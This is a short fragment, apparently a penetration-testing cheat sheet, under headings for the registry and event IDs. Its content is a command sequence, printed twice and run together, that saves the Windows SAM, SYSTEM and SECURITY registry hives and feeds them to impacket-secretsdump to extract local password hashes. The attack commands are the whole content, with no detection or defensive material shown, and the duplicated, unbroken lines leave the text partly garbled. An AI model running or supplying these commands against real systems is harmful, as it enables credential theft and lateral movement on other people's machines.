REGISTRY
EVENT IDs
reg.exe save HKLM\SAM <PATH TO DUMP>reg.exe save HKLM\SYSTEM <PATH TO DUMP>reg.exe save HKLM\SECURITY <PATH TO DUMP>impacket-secretsdump -SAM sam -SYSTEM system -SECURITY security LOCALLast updated
reg.exe save HKLM\SAM <PATH TO DUMP>reg.exe save HKLM\SYSTEM <PATH TO DUMP>reg.exe save HKLM\SECURITY <PATH TO DUMP>impacket-secretsdump -SAM sam -SYSTEM system -SECURITY security LOCALLast updated